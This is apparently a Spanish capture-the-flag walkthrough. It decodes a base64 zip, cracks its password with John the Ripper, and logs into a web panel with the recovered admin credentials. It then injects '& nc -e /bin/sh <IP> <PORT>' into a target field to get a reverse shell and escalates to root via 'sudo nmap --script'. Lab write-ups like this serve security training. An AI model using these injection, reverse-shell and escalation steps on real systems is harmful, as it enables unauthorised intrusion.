Parece un Base64 por lo que con este script de python que me he creado te lo decodificara y metera en un archivo .bin...
import base64
# Cadena codificada en base64
encoded_string = "UEsDBBQAAQAAAAOfg1LxSVvWHwAAABMAAAAJAAAAY3JlZHMudHh093OsvnCY1d4tLCZqMvRD+ZUURw+5YmOf9bS11scvmFBLAQI/ABQAAQAAAAOfg1LxSVvWHwAAABMAAAAJACQAAAAAAAAAIAAAAAAAAABjcmVkcy50eHQKACAAAAAAAAEAGABssaU7qijXAYPcazaqKNcBg9xrNqoo1wFQSwUGAAAAAAEAAQBbAAAARgAAAAAA"
# Decodificar desde base64
decoded_bytes = base64.b64decode(encoded_string)
# Guardar los bytes decodificados en un archivo
with open('output.bin', 'wb') as file:
file.write(decoded_bytes)
print("Los datos han sido decodificados y guardados en 'output.bin'.")
Una vez ejecutado, obtendremos el contenido viendose de la siguiente forma...
Una vez teniendo el .zip si lo intentamos descomprimir pedira contraseña, por lo que la intentaremos crackear...
zip2john file.zip > hash
john --wordlist=<WORDLIST> hash
Info:
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
killah (output.zip/creds.txt)
1g 0:00:00:00 DONE (2024-06-18 10:32) 33.33g/s 546133p/s 546133c/s 546133C/s 123456..cocoliso
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Veremos que la contraseña es killah por lo que ahora si lo descomprimiremos...
unzip file.zip
Metemos esa contraseña y obtendremos un archivo llamado creds.txt que contendra lo siguiente...
admin
isitreal31__
Si esas credenciales las ingresamos en la pagina del login que encontramos nos meteremos como admin en la pagina...
Y donde pone Target Specification pondremos lo siguiente...
& nc -e /bin/sh <IP> <PORT>
Le damos a Add Target...
Y por utlimo donde pone Job Name ponemos lo que sea por ejemplo test...
Una vez hecho todo esto, nos pondremos a la escucha...
nc -lvnp <PORT>
Y le damos en la pagina al boton You Must Provide At Least One Target que es en azul, una vez hecho eso nos redirigira a otro sitio donde nos muestra la informacion y ya tendremos una shell como el usuario apache...
La sanitizamos un poco...
script /dev/null -c bash
export TERM=xterm
export SHELL=/bin/bash
Una vez estando dentro hacemos lo siguiente...
echo 'os.execute("/bin/sh")' > /tmp/nmap.script
sudo nmap --script=/tmp/nmap.script
Info:
Starting Nmap 6.40 ( http://nmap.org ) at 2024-06-18 10:56 EDT
NSE: Warning: Loading '/tmp/nmap.script' -- the recommended file extension is '.nse'.
sh-4.2# whoami
root
Y con esto ya seriamos root, por lo que leeremos la flag...